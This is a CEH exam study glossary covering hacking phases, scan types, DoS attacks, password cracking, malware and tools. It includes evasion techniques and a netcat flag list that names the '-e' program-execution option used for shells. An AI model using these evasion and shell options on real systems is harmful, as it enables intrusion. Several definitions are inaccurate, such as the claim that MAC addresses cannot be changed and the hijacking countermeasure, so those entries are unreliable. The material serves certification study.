﻿CEH Study Guide
-----------------------------

Phases of Ethical Hacking
1. Reconnaissance / Footprinting
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Covering Tracks
Ethical Hacker
A person who hacks into a computer network in order to test or evaluate its security, rather than with malicious or criminal intent and uses his or her skills for defensive purposes only.
18 US Code 1029
Fraud and related activity in connection with access devices.
18 US Code 1030
Fraud and related activity in connection with computers.
Botnet
A botnet is a number of Internet-connected computers communicating with other similar machines in an effort to complete repetitive tasks and objectives. This can be as mundane as keeping control of an Internet Relay Chat (IRC) channel, or it could be used to send spam email or participate in distributed denial-of-service attacks.
OS Fingerprinting
Determining the type of operating system used by studying the types of packets flowing from a system. Passive OS fingerprinting only analyzes the packets. Active OS fingerprinting sends challenges to the OS and examines the type of responses.
SPAN Port
Indicates the ability to copy traffic from any or all data ports to a single unused port but also usually disallows bidirectional traffic on that port to protect against backflow of traffic into the network.
Covert Channel
In computer security, a covert channel is a type of computer security attack that creates a capability to transfer information objects between processes that are not supposed to be allowed to communicate by the computer security policy. It uses the protocol in a way that it's not supposed to be used.
Cryptography
Cryptography is a method of storing and transmitting data in a particular form so that only those for whom it is intended can read and process it. It will protect data in both storage and in transit.
Block Cipher
Is a deterministic algorithm operating on fixed-length groups of bits, called blocks, with an unvarying transformation that is specified by a symmetric key.
Circuit-level gateway firewall
Is a type of firewall. Circuit level gateways work at the session layer of the OSI model, or as a "shim-layer" between the application layer and the transport layer of the TCP/IP stack. They monitor TCP handshaking between packets to determine whether a requested session is legitimate.
System Integrity Verifier (SIV)
State of a system where it is performing its intended functions without being degraded or impaired by changes or disruptions in its internal or external environments.
Zone Transfer
When you edit the host information on one of your DNS servers (the ``master'' or ``primary''), you have to copy it to the other DNS servers (the ``slaves'' or ``secondary's''). A Zone Transfer is the term used to refer to the process by which the contents of a DNS Zone file are copied from a primary DNS server to a secondary DNS server. It happens over TCP port 53.
Proxy Server
A proxy server is a dedicated computer or a software system running on a computer that acts as an intermediary between an endpoint device, such as a computer, and another server from which a user or client is requesting a service. Hackers use proxy servers to hide their tracks such as their IP addresses.
Dual-Homed
Dual-homed or dual-homing can refer to either an Ethernet device that has more than one network interface, for redundancy purposes, or in firewall technology, dual-homed is one of the firewall architectures for implementing preventive security. It's also a piece of hardware technology that Proxies and IDS/IPS use.
Network Tap
A network tap is a hardware device which provides a way to access the data flowing across a computer network. In many cases, it is desirable for a third party to monitor the traffic between two points in the network. Sometimes it's used along with Wireshark to capture all the Network traffic.
Active Sniffing
When sniffing is performed on a switched network, it is known as Active Sniffing.
Ping of Death
On the Internet, ping of death is a denial of service (DoS) attack caused by an attacker deliberately sending an IP packet larger than the 65,536 bytes allowed by the IP protocol. One of the features of TCP/IP is fragmentation; it allows a single IP packet to be broken down into smaller segments.
PCI DSS
The Payment Card Industry Data Security Standard (PCI DSS) is a proprietary information security standard for organizations that handle branded credit cards from the major card schemes including Visa, MasterCard, American Express, Discover, and JCB.
PCI Requirement 11
Regularly test security systems and processes. Many organizations perform little or no regular testing on the adequacy of the security controls governing their network and Internet-facing Web site applications. Failure to periodically run internal and external network scans to identify weaknesses can prove costly when back doors are left open to hackers and malicious code. Nessus is a perfect tool to use for this requirement. PCI must perform penetration testing once a year or after any major upgrade or changes.
Nessus
Nessus is a remote security scanning tool, which scans a computer and raises an alert if it discovers any vulnerabilities that malicious hackers could use to gain access to any computer you have connected to a network. It does this by running over 1200 checks (signatures) on a given computer, testing to see if any of these attacks could be used to break into the computer or otherwise harm it.
Passive Sniffing
Hubs see all the traffic in that particular collision domain. Sniffing performed on a hub is known as passive sniffing.
Security Auditing
Is the final step in the implementation of your security defenses. First you undertake a risk analysis to discover your assets and your risks. Then you develop a security policy to define what you are going to defend and how you are going to defend it. It's also an adherence to the security policy.
Policy Document
Policies are the business rules and guidelines of a company that ensure consistency and compliance with the company's strategic direction. The Policies lay out the business rules under which a company, division, or department will operate.
Process Document
Processes are related activities that produce a specific service or product.
Procedure Document
Procedures define the specific instructions necessary to perform a task or part of a Process. Procedures can take the form of a work instruction, a desk top Procedure, a quick reference guide, or a more detailed Procedure.
Sheepdip
Is a dedicated computer which is used to test files on removable media for viruses before they are allowed to be used with other computers.
Honeypot
Is a trap set to detect, deflect, or, in some manner, counteract attempts at unauthorized use of information systems. Generally, a honeypot consists of a computer, data, or a network site that appears to be part of a network, but is actually isolated and monitored, and which seems to contain information or a resource of value to attackers.
Bastion Host
is a special purpose computer on a network specifically designed and configured to withstand attacks. The computer generally hosts a single application, for example a proxy server, and all other services are removed or limited to reduce the threat to the computer. It is hardened in this manner primarily due to its location and purpose, which is either on the outside of the firewall or in the DMZ and usually involves access from untrusted networks or computers.
3 different types of authentication
The three types of authentication are what you know (password), what you have (token) and what you are (Biometrics).
Null Session
Is an anonymous connection to a freely accessible network share called IPC$ on Windows-based servers. To counter such a vulnerability, you must disable ports 139 and 445.
Canonicalization
Is a process for converting data that has more than one possible representation into a "standard", "normal", or simplest form.
Buffer Overflow
In computer security and programming, a buffer overflow, or buffer overrun, is an anomaly where a program (That is poorly written), while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory. This is a special case of violation of memory safety. The register that constantly gets overwritten is the EIP (Extended Instruction Pointer).
Cross-site scripting
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.
Session Hijacking
Is the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. A way to counter this attack is to use out of order sequence numbers.
Canary
Canaries or canary words are known values that are placed between a buffer and control data on the stack to monitor buffer overflows. When the buffer overflows, the first data to be corrupted will usually be the canary, and a failed verification of the canary data is therefore an alert of an overflow. Some Microsoft product uses this type of defense.
Session Cookie
Also called a transient cookie, a cookie that is erased when the user closes the Web browser.
Persistent / Permanent Cookies
These remain on your hard drive until you erase them or they expire. How long a cookie remains on your browser depends on how long the visited website has programmed the cookie to last.
Loki
In cryptography, LOKI89 and LOKI91 are symmetric-key block ciphers designed as possible replacements for the Data Encryption Standard (DES). It's also used to bypass IDS (Intrusion Detection Systems) because the traffic is encrypted and the IDS can't decrypt same.
Firewalking
Firewalking is a method of disguising port scans. In practical applications, firewalking is similar to tracerouting and works by sending into the firewall TCP or UDP packets that have a TTL set at one hop greater than the targeted firewall. If the packet makes it through the gateway, it is forwarded to the next hop where the TTL equals zero and elicits a TTL "exceeded in transit" message, at which point the packet is discarded. Using this method, access information on the firewall can be determined if successive probe packets are sent. It can also discover the rules set on the gateway.
Brute Force Attack
A brute force attack is a trial-and-error method used to obtain information such as a user password or personal identification number (PIN). In a brute force attack, the software tries every possible combination of characters until it finds the correct one. It takes the longest, but it's the most effective against cracking passwords.
Hybrid Attack
Basically, the hybrid attack is just a Combination attack. One side is simply a dictionary, the other is the result of a Brute-Force attack.
Dictionary Attack
A dictionary attack is a method of breaking into a password-protected computer or server by systematically entering every word in a dictionary as a password. A dictionary attack can also be used in an attempt to find the key necessary to decrypt an encrypted message or document.
Phishing Attack
Phishing is the illegal attempt to acquire sensitive information such as usernames, passwords, and credit card details (and sometimes, indirectly, money), often for malicious reasons, by masquerading as a trustworthy entity in an electronic communication or via a fake website.
Rainbow Tables
A rainbow table is a precomputed table for reversing cryptographic hash functions, usually for cracking password hashes. Tables are usually used in recovering a plaintext password up to a certain length consisting of a limited set of characters.
Password Salting
In cryptography, a salt is random data that is used as an additional input to a one-way function that hashes a password or passphrase. The primary function of salts is to defend against dictionary attacks versus a list of password hashes and against pre-computed rainbow table attacks.
Chosen plaintext attack
A chosen-plaintext attack (CPA) is an attack model for cryptanalysis which presumes that the attacker can obtain the ciphertexts for arbitrary plaintexts. The goal of the attack is to gain information which reduces the security of the encryption scheme.
Stream Cipher
Is a symmetric key cipher where plaintext digits are combined with a pseudorandom cipher digit stream (keystream). In a stream cipher each plaintext digit is encrypted one at a time with the corresponding digit of the keystream, to give a digit of the cipher text stream.
Hunt Software
Hunt is a program for intruding into a connection, watching it and resetting it. It's commonly used for the man in the middle attack as a form of intercepting traffic.
USB Dumper
USB Dumper is a simple yet very reliable software solution designed to provide you with the ability to automatically and silently copy data from a flash drive that is connected to your PC, without prompting you for any confirmation.
Man-in-the-middle Attack
In cryptography and computer security, aman-in-the-middle attack (often abbreviated to MITM, MitM, MIM, MiM or MITMA) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other.
SSL
Stands for Secure Sockets Layer. It provides a secure connection between internet browsers and websites, allowing you to transmit private data online. Sites secured with SSL display a padlock in the browsers URL and possibly a green address bar if secured by an EV Certificate. It can also be used by attackers to bypass IDS because they cannot detect them as the traffic is encrypted.
Kerberos
Is a computer network authentication protocol which works on the basis of 'tickets' to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner. Its designers aimed it primarily at a client-server model and it provides mutual authentication—both the user and the server verify each other's identity. Kerberos protocol messages are protected against eavesdropping and replay attacks and they use port 88.
XML Denial of Service Attack
An XML denial-of-service attack is a content-borne denial-of-service attack whose purpose is to shut down a web service or system running that service. It's also a vulnerability for the SOA (Service Oriented Architecture).
Throttling
The process of limiting resource usage to keep a particular process from bogging down and/or crashing a system. Relevant as a countermeasure in DoS attacks, where an attacker attempts to crash the system by overloading it with input. It adjusts all incoming traffic so that the local servers can properly process the traffic.
IP Fragment Scanning
Is the process of breaking up a single Internet Protocol (IP) datagram header into multiple packets of smaller size, so that packet filters are not able to detect them.
Asymmetry
One answer is asymmetric encryption, in which there are two related keys--a key pair. A public key is made freely available to anyone who might want to send you a message. A second, private key is kept secret, so that only you know it.
Shared Key Authentication
The clients sends an authentication request to the access point (AP). The AP replies with a clear text challenge (128 Bytes). The client encrypts the challenge text using the configured WEP key and sends it back in another authentication request. The AP decrypts the response and if it matches the challenge text, the AP sends back a positive response.
Shared Key Authentication
The clients sends an authentication request to the access point (AP). The AP replies with a clear text challenge (128 Bytes). The client encrypts the challenge text using the configured WEP key and sends it back in another authentication request. The AP decrypts the response and if it matches the challenge text, the AP sends back a positive response.
Key Escrow
Is an arrangement in which the keys needed to decrypt encrypted data are held in escrow so that, under certain circumstances, an authorized third party may gain access to those keys.
CSIRT (Computer Security Incident Response Team)
Computer Security Incident Response Team is an organization that receives reports of security breaches, conducts analyses of the reports and responds to the senders. It's a single point of contact in the US to report computer security breaches and security incidents.
ICMP Pings
A ping sweep (also known as an ICMP sweep) is a basic network scanning technique used to determine which of a range of IP addresses map to live hosts (computers). Whereas a single ping will tell you whether one specified host computer exists on the network, a ping sweep consists of ICMP (Internet Control Message Protocol) ECHO requests sent to multiple hosts. If a given address is live, it will return an ICMP ECHO reply and ICMP ping traverses the firewall.
IPSec
Is a protocol suite for securing Internet Protocol (IP) communication by authenticating and encrypting each IP packet of a communication session. IPsec includes protocols for establishing mutual authentication between agents at the beginning of the session and negotiation of cryptographic keys to be used during the session. It can be used to protect data flows between two hosts.
WinPCap
WinPcap is a port of the UNIX libpcap (packet capture) library, which in turn is built on BPF (Berkeley Packet Filter). WinPcap consists of wpcap.dll, which implements the high-level functions, and packet.dll, which is the kernel-mode driver.
Toneloc Tool
It's used for war dialing.
Common ICMP Message Types:
0: Echo Reply (ping command)
3: Destination Unreachable
3 Code 13: Administratively prohibited
5: Redirect
8: Echo Request (ping command)
11: Time Exceeded
13: Timestamp
nmap -sS
SYN Stealth Scan
nmap -sO
IP Protocol Scan / Open Ports (Timing options can avoid detections by an IDS)
nmap -sA
Map out firewall rulesets
nmap -O
Operating System detection
nmap -sP
IP addresses active on the Network
nmap -p
Port or ports to scan
nmap -sV
Version scanning
nmap -A
Aggressive OS detection
nmap -F
Fast 1000 common ports
nmap -PO
Protocol list
Nc -e program
inbound program to execute
Nc -l
Listen mode for inbound connections
Nc -L
Listen harder, re-listen on socket close
Nc -o file
Hex dump of traffic
Nc -p port
Local port number
Nc -t
Answer TELNET negotiation
Nc -u
UDP mode
Nc -v
Verbose mode (use twice to be more verbose)
Nc -w seconds
Timeout for connects and final net reads
Diffie-Hellman Groups
They determine the strength of the key used in the exchange process.
DH Group 1
768-bit
DH Group 2
1024-bit
DH Group 5
1536-bit
3DES encryption
In cryptography, Triple DES (3DES) is the common name for the Triple Data Encryption Algorithm (TDEA or Triple DEA) symmetric-key block cipher, which applies the Data Encryption Standard (DES) cipher algorithm three times to each data block.
GET and POST commands
HTML forms submit their results using one of two methods, GET or POST. In the GET method, all form parameters and their values appear in the query string of the next URL, which the user sees. An attacker may tamper with this query string. You should replace GET commands with POST whenever possible as it's more secure.
SYSKEY
Is a utility that encrypts the hashed password information in a SAM database in a Windows system using a 128-bit RC4 encryption key. Access to a computer so protected requires either a password, either typed in or via external storage (floppy disk, USB flash drive).
Tailgating Social Engineering Attack
An attacker, seeking entry to a restricted area secured by unattended, electronic access control, simply walks in behind a person who has legitimate access. Following common courtesy, the legitimate person will usually hold the door open for the attacker or the attackers themselves may ask the employee to hold it open for them.
IPchains
Linux IP Firewalling Chains, normally called ipchains, is free software to control the packet filter or firewall capabilities in the 2.2 series of Linux kernels. It superseded ipfwadm, but was replaced by iptables in the 2.4 series.
Chosen-Ciphertext Attack
Is an attack model for cryptanalysis in which the cryptanalyst gathers information, at least in part, by choosing a ciphertext and obtaining its decryption under an unknown key. In the attack, an adversary has a chance to enter one or more known ciphertexts into the system and obtain the resulting plaintexts. From these pieces of information the adversary can attempt to recover the hidden secret key used for decryption.
SOX (Sarbanes-Oxley Act)
Is legislation passed by the U.S. Congress to protect shareholders and the general public from accounting errors and fraudulent practices in the enterprise, as well as improve the accuracy of corporate disclosures. The U.S. Securities and Exchange Commission (SEC) administers the act, which sets deadlines for compliance and publishes rules on requirements.
TCP Handshake
The procedure that takes place between two TCP/IP nodes to establish a connection. Known as the "SYN, SYN-ACK, ACK handshake," computer A transmits a SYN packet to computer B, which sends back a SYN-ACK packet to A. Computer A then transmits an ACK packet to B, and the connection is established. The ACK flag is then transmitted in either direction after the TCP handshake.
Half-Open-Scan
This technique is often referred to as TCP SYN, because you don't open a full TCP connection. You send a SYN packet, as if you are going to open a real connection and wait for a response. A SYN|ACK indicates the port is listening. A RST is indicative of a non- listener. If a SYN|ACK is received, you immediately send a RST to tear down the connection.
XMAS Scan
Is a packet with every single option set for whatever protocol is in use. When used as part of scanning a system, the TCP header of a Christmas tree packets has the flags SYN, FIN, URG and PSH set. Windows systems do not respond correctly to the type of scan. If the port is closed, you will receive a RST response.
TCP Connect scan
This type of scan connects to the target port and completes the connection (3 way handshake) and can be easily detected by the target system, but it's the most reliable. It's the fastest, but not the stealthiest.
TCP ACK Scan
Is commonly used to map out firewall rulesets. In particular, it helps understand whether firewall rules are stateful or not. The downside is that it cannot distinguish open or closed ports. Sometimes no response means that the port could be filtered.
NULL Scan
Does not set any bits (TCP flag header is 0). Everything is turned off. And if the port being scanned is closed, it will receive a RST response. If the port is opened, no response will be provided.
Idle Scan
Is a TCP port scan method that consists of sending spoofed packets to a computer to find out what services are available. This is accomplished by impersonating another computer called a "zombie" (that is not transmitting or receiving information) and observing the behavior of the ''zombie'' system.
Stealth Scan
These types of scans never complete the 3 way handshake or open a full TCP connection to the target.
SYN Flood Attack
Is a form of denial-of-service attack in which an attacker sends a succession of SYN requests (Half open connections without replies) to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic.
Distributed Port Scan
Distributed portscans occur when multiple hosts (multiple computers) query one host (or computer) for open services and/or ports. This is used to evade an IDS and obfuscate command and control hosts.
Stateful Firewall Inspection
Ensures that all inbound packets are the result of an outbound request. It was designed to prevent harmful or unrequested packets from entering the computer and it will not respond to an ACK scan on port 80 because there is no outbound requests.
Robot.txt file
Robots.txt is common name of a text file that is uploaded to a Web site's root directory and linked in the html code of the Web site. The robots.txt file is used to provide instructions about the Web site to Web robots and spiders. Web authors can use robots.txt to keep cooperating Web robots from accessing all or parts of a Web site that you want to keep private.
Archive.org Website
The Archive.org website is a digital archive of the World Wide Web and other information on the Internet created by the Internet Archive, a non-profit organization, based in San Francisco, California. The service enables users to see archived versions of web pages across time. This is commonly used to footprint an organization to gather competitive intelligence or any other type of info that may be useful.
RIR (Registry Internet Registry)
AfriNIC, ARIN, APNIC, LACNIC and RIPE NCC.
ARIN Registry
The American Registry for Internet Numbers (ARIN) is the Regional Internet Registry (RIR) for Canada, the United States (.com), and many Caribbean and North Atlantic islands.
RID 500
Administrator Account
RID 501
Guest Account
RID 1000+
1st registered User and so on.
TCP-OVER-DNS Tool
Tcp-over-dns is a client server tool used to evade firewall inspections. It can be used with Windows, Linux and Solaris.
Ike-scan tool
Is a command-line tool for discovering, fingerprinting and testing IPsec VPN and Firewall systems. It constructs and sends IKE Phase-1 packets to the specified hosts, and displays any responses that are received.
TCP Flow tool
Is a program that captures data transmitted as part of TCP connections (flows), and stores the data in a way that is convenient for protocol analysis and debugging. Each TCP flow is stored in its own file. Thus, the typical TCP flow will be stored in two files, one for each direction.
Filesnarf tool
Sniffs files from NFS traffic.
Wireshark (formally known as Ethereal)
Ethereal/Wireshark is a network packet analyzer. A network packet analyzer will try to capture network packets and tries to display that packet data as detailed as possible. It performs better and more reliable if the networks being scanned uses Hubs.
Cain and Able
Is a password recovery tool for Microsoft Windows. It can recover many kinds of passwords using methods such as network packet sniffing, cracking various password hashes (Cisco VPN configuration files) by using methods such as dictionary attacks, brute force and cryptanalysis attacks.
John the Ripper Tool
Is a free password cracking software tool. It's one of the most popular password testing and breaking programs as it combines a number of password crackers into one package, auto detects password hash types, and includes a customizable cracker.
L0phtCrack
Is a password auditing and recovery application. It uses multiple assessment methods to assist administrators in reducing security risks.
NWPCrack
it's a brute force login attack program that uses wordlist attack method against NetWare.
ADMmutate
A shell code mutation engine, can evade NIDS. from the doc: 'I have chosen to attack the signature analysis method with a technique very well known to virus enthusiasts, a polymorphic algorithm that is designed to impair the effectiveness of regexp's against known attack signatures.
Snort tool
Snort is an open source network intrusion prevention system (IPS) capable of performing real-time traffic analysis (Sniffing) and packet-logging on IP networks. It can perform protocol analysis, content searching & matching and can be used to detect a variety of attacks and probes, such as buffer overflows, stealth port scans, CGI attacks, SMB probes, OS fingerprinting attempts and more. It can run in 3 modes (Packet logger, Sniffer and Network Intrusion Detection System)
Smurf Attack
The Smurf Attack is a distributed denial-of-service attack in which large numbers of Internet Control Message Protocol (ICMP) packets with the intended victim's spoofed source IP are broadcast to a computer network using an IP Broadcast address. To counter this type of attack, you can disable the acceptance of broadcast ping messages on the router.
Teardrop Attack
Sends packets that are malformed, with the fragmentation offset value tweaked, so that the receiving packets overlap.
Fragroute
It intercepts, modifies, and rewrites egress traffic destined for a specified host. It features a simple ruleset language to delay, duplicate, drop, fragment, overlap, print, reorder, segment, source-route, or otherwise monkey with all outbound packets destined for a target host, with minimal support for randomized or probabilistic behavior.
Rootkits
A rootkit is a stealthy type of software, typically malicious, designed to hide the existence of certain processes or programs from normal methods of detection and enable continued privileged access to a computer. The best way you can get rid of them is to load from a known good media. It's also designed to replace legitimate programs.
Packet Filter
Packet filtering is a firewall technique used to control network access by monitoring outgoing and incoming packets and allowing them to pass or halt based on the source and destination Internet Protocol (IP) addresses, protocols and ports. It also inspects the header information of said packets.
Suicide Hacker
Suicide hackers are those who hack for some purpose and even don't bother to suffer long term jail due to their activities. They can be bad as well as good.
Hacktivism
Is the act of hacking, or breaking into a computer system, for a politically or socially motivated purpose or cause. The individual who performs an act of hacktivism is said to be a hacktivist.
IPsec
Is a protocol suite for securing Internet Protocol (IP) communications by authenticating and encrypting each IP packet of a communication session. Can also be used as a non-repudiation technique.
LM Hashes/Authentication
Is a compromised password hashing function that was the primary hash that Microsoft LAN Manager and Microsoft Windows versions prior to Windows NT used to store user passwords. Passwords are limited to a maximum of only 14 characters. Should be disabled whenever possible via the registry and uses DES algorithm.
OWASP (Open Web Application Security Project)
Is an online community dedicated to web application security. This community works to create freely-available articles, methodologies, documentation, tools, and technologies that include web application flaws and a way to address and correct them.
White Box Testing
All information about the company is given to the assessment personnel to address the security issues of the companies systems.
Gray Box Testing
Some information about the company is given to the assessment personnel to address the security issues of the companies systems.
Black Box Testing
No information about the company (other than its name) is given to the assessment personnel to address the security issues of the companies systems.
Null-Bytes
Most shellcodes are written without the use of null bytes because they are intended to be injected into a target process through null-terminated strings. When shellcode that contains nulls is injected in this way, only part of the shellcode would be injected, making it incapable of running successfully because these will also end the string. They should be avoided at all cost when writing shellcodes.
Null user
It's a user that does not have a username or password.
Buffer Overflow
If the amount of data copied into a memory buffer exceeds the size of the buffer, the extra data will overwrite whatever is in the adjacent bytes, and those bytes could hold numbers and codes the program constantly uses. A common cause of malfunctioning software due to the fact of bad quality assurance on same.
Set type = A
Specifies a computer's IP address
Set type = MB
Specifies a mailbox domain name
Set type = MX
Specifies the mail exchanger
Set type = NS
Specifies a DNS name server for the named record
Zone Files
Is a text file that describes a DNS zone. A DNS zone is a subset, often a single domain, of the hierarchical domain name structure of the DNS. The zone file contains mappings between domain names and IP addresses and other resources, organized in the form of text representations of resource records (A, MX, NS, and SOA)
Cross Certification
Cross certification enables entities in one public key infrastructure (PKI) to trust entities in another PKI. This mutual trust relationship is typically supported by a cross-certification agreement between the certification authorities (CAs) in each PKI. The agreement establishes the responsibilities and liability of each party.
PKI (Public Key Infrastructure)
Is a set of hardware, software, people, policies, and procedures needed to create, manage, distribute, use, store, and revoke digital certificates and manage public-key encryption and it uses RSA 1024 bit algorithm. It verifies the applicant via the Registration Authority.
How to detect IP Spoofing:
Check the IP address that was found within the data, and reply to it. It is very common for the spoofed address to either not belong to a real host, or one that is not active, and as a result there will be no response sent back.

Verify the Time to Live (TTL) value of the original sent packet before sending a request to the questionable host. If there is a response sent back this does not necessarily mean that it is from a legitimate source, and another method to check for spoofing can be attempted. Check the TTL of both packets to see if they match. If they do not match, then it is likely from a spoofed source.

Check the IP identification numbers of the packet. This is a less reliable method, but in general a true packet from the IP will have an ID that is close in value. If this is not true then there is likely something suspicious taking place with the sender.
WHOIS Search
Is a query and response protocol that is widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system, but is also used for a wider range of other information and can be used to passively gather information about a target or company.
Dumpster Diving
Involves searching through trash or garbage looking for something useful. This is often done to uncover useful information that may help an individual get access to a particular network. So, while the term can literally refer to looking through trash, it is used more often in the context of any method (especially physical methods) by which a hacker might look for information about a computer or network system.
Replay Attack
A replay attack is a form of network attack in which a valid data transmission is maliciously or fraudulently repeated or delayed. This is carried out either by the originator or by an adversary who intercepts the data and retransmits it. One way to countermeasure this attack is to use challenge/response authentication.
MAC Flooding Attack
It's the act of attempting to overload the switches content addressable memory table forcing legitimate MAC addresses out of same. This can cause a DOS against the switch. This can be countered via port security on the switch, by limiting the number of MAC addresses the port can learn.
MAC Spoofing
MAC spoofing is a technique for changing a factory-assigned Media Access Control (MAC) address of a network interface on a networked device. The MAC address is hard-coded on a network interface controller (NIC) and cannot be changed.
Purpose of a Security Assessment
The goal of a security assessment, is to ensure that necessary security controls are integrated into the design and implementation of a project for validation.
Automated Vulnerability Assessment Tool
Is the automated process of identifying, quantifying, and prioritizing (or ranking) the vulnerabilities in a system. One of the biggest problems with these tools is that they are very noisy and can possibly be detected on the network.
ISO 27002 Standard
It establishes guidelines and general principles for initiating, implementing, maintaining, and improving information security management within an organization. The actual security controls listed in the standard are intended to address the specific requirements identified via a formal risk assessment.
Netstumbler
Is a tool for Windows that facilitates detection of Wireless LANs using the 802.11b, 802.11a and 802.11g WLAN standards. It can also collect wireless packets and decrypt same when needed.
WEP
Wired Equivalent Privacy (WEP) is a security protocol, specified in the IEEE Wireless Fidelity (Wi-Fi) standard, 802.11b, that is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what is usually expected of a wired LAN.
WPA2
WPA2 is a security technology commonly used on Wi-Fi wireless networks. WPA2 (Wireless Protected Access 2) replaced the original WPA technology on all certified Wi-Fi hardware since 2006 and is based on the IEEE 802.11i technology standard for data encryption. It uses AES-CCMP 128 bit Encryption and has a IV size of 48.
Omnidirectional Antenna
is a class of antenna which radiates radio wave power uniformly in all directions in one plane, with the radiated power decreasing with elevation angle above or below the plane, dropping to zero on the antenna's axis. It's mostly used in wireless communication.
Aircrack
Is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs. It works with any wireless network interface controller whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic.
Rogue Access Point
A rogue access point is a wireless access point that has either been installed on a secure company network without explicit authorization from a local network administrator, or has been created to allow a hacker to conduct a man-in-the-middle attack by overriding the signal of the real access point.
Hash Algorithm - SHA-1
160 Bits
Hash Algorithm - SHA-512
512 Bits
Hash Algorithm - MD5
128 Bits (32 Characters in length)
Hash Algorithm - CRC-32
32 Bits
Hash Algorithm - MD6
512 Bits
RC4
In cryptography, RC4 (Rivest Cipher 4 also known as ARC4 or ARCFOUR meaning Alleged RC4, see below) is the most widely used software stream cipher and is used in popular Internet protocols such as Transport Layer Security (TLS).
Collision resistance
Is a property of cryptographic hash functions: a hash function H is collision resistant if it is hard to find two inputs that hash to the same output.
HEAD / HTTP/1.0
When entering this statement in a command line and pressing enter twice, you are trying to grab the operating systems banner.
Blind SQL Injection
Is a form of SQL Injection that overcomes the lack of error messages. Without the error messages that facilitate SQL Injection, the attacker constructs input strings that probe the target through simple Boolean SQL expressions. The results are usually not visible to the attacker.
ARP Poisoning
Is a form of attack in which an attacker changes the Media Access Control (MAC) address and attacks an Ethernet LAN by changing the target computer's ARP cache with a forged ARP request and reply packets (It's achieved in two steps). This modifies the layer -Ethernet MAC address into the hacker's known MAC address to monitor it. Because the ARP replies are forged, the target computer unintentionally sends the frames to the hacker's computer first instead of sending it to the original destination.
Macro Virus
A type of computer virus that is encoded as a macro embedded in a document. Many applications, such as Microsoft Word and Excel, support powerful macro languages. These applications allow you to embed a macro in a document, and have the macro execute each time the document is opened.
Trojan Virus
Is generally a non-self-replicating type of malware program containing malicious code that, when executed, carries out actions determined by the nature of the Trojan, typically causing loss or theft of data, and possible system harm. They usually can be detected in the systems drivers. It also masquerades as legitimate code.
Wrappers
Is a program used to combine two or more executables into a single packaged program.
Polymorphic Virus
A virus that changes its virus signature (i.e., its binary pattern) every time it replicates and infects a new file in order to keep from being detected by an antivirus program.
Stealth Virus
A computer virus that actively hides itself from antivirus software by either masking the size of the file that it hides in or temporarily removing itself from the infected file and placing a copy of itself in another location on the drive, replacing the infected file with an uninfected one that it has stored on the hard drive.
Cavity Virus
A cavity virus attempts to install itself inside of the file it is infecting.
Back Orifice
Is a controversial computer program designed for remote system administration. It enables a user to control a computer running the Microsoft Windows operating system from a remote location. The name is a play on words on Microsoft BackOffice Server software. It can also control multiple computers at the same time using imaging. It usually comes from port 31337.
PGP Encryption
Is a data encryption and decryption computer program that provides cryptographic privacy and authentication for data communication. It uses a serial combination of hashing, data compression, symmetric-key cryptography, and finally public-key cryptography; each step uses one of several supported algorithms. Each public key is bound to a user name and/or an e-mail address.
Session Splicing
Works by delivering the payload over multiple packets, which defeats simple pattern matching without session reconstruction. This payload can be delivered in many different ways and even spread out over long periods of time.
Static NAT (Network Address Translation)
A type of NAT in which a private IP address is mapped to a public IP address, where the public address is always the same IP address (i.e., it has a static address).
RFC 2827
Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing
SMB (Server Message Block)
The Server Message Block (SMB) protocol is a network file sharing protocol that allows applications on a computer to read and write to files and to request services from server programs in a computer network. The SMB protocol can be used on top of its TCP/IP protocol or other network protocols. They use ports 135 through 139.
Cygwin
Is a Unix-like environment and command-line interface for Microsoft Windows. Cygwin provides native integration of Windows-based applications, data, and other system resources with applications, software tools, and data of the Unix-like environment.
Zero-day vulnerability
A zero day vulnerability refers to a hole in software that is unknown to the vendor. This security hole is then exploited by hackers before the vendor becomes aware and hurries to fix it—this exploit is called a zero day attack.
CALCS.exe
Display or modify Access Control Lists (ACLs) for files and folders.
Snow Steganography
Is used to conceal messages in ASCII text by appending whitespace to the end of lines. Because spaces and tabs are generally not visible in text viewers, the message is effectively hidden from casual observers. And if the built-in encryption is used, the message cannot be read even if it is detected.
Microsoft Baseline Security Analyzer (MBSA)
Is a software tool released by Microsoft to determine security state by assessing missing security updates and less-secure security settings within Microsoft Windows and Windows components.
NTLMv2
NTLMv2 was developed in response to attacks against the LM authentication protocol. The LM protocol, as the name implies, was originally used in the old LAN Manager Network operating system in the mid-1980s. It uses the MD5 password hash algorithm.
HTTP Tunneling
Is a technique by which communications performed using various network protocols are encapsulated using the HTTP protocol, the network protocols in question usually belonging to the TCP/IP family of protocols. The HTTP protocol therefore acts as a wrapper for a channel that the network protocol being tunneled uses to communicate.
Network Time Protocol (NTP)
Is a networking protocol for clock synchronization between computer systems over packet-switched, variable-latency data networks. It uses UDP port 123
Message Repudiation and Non-repudiation
Repudiation means that a party can claim that he did not send a message to someone or the form of the communication took place. Non-repudiations means that parties can prove that a communications took place.
TOR Proxy
Tor directs Internet traffic through a free, worldwide, volunteer network consisting of more than six thousand relays to conceal a user's location and usage from anyone conducting network surveillance or traffic analysis.
Tripwire
Is a security and data integrity tool useful for monitoring and alerting on specific file change(s) on a range of systems.
Sigverif.exe
Microsoft's digital file signature integrity verification.
Poison Ivy
is a RAT (Remote Access Trojan) that is also known as the Botnet Command Control Center.
Single sign-on (SSO)
Is a property of access control of multiple related, but independent software systems. With this property a user logs in once and gains access to all systems without being prompted to log in again at each of them.
LDAP
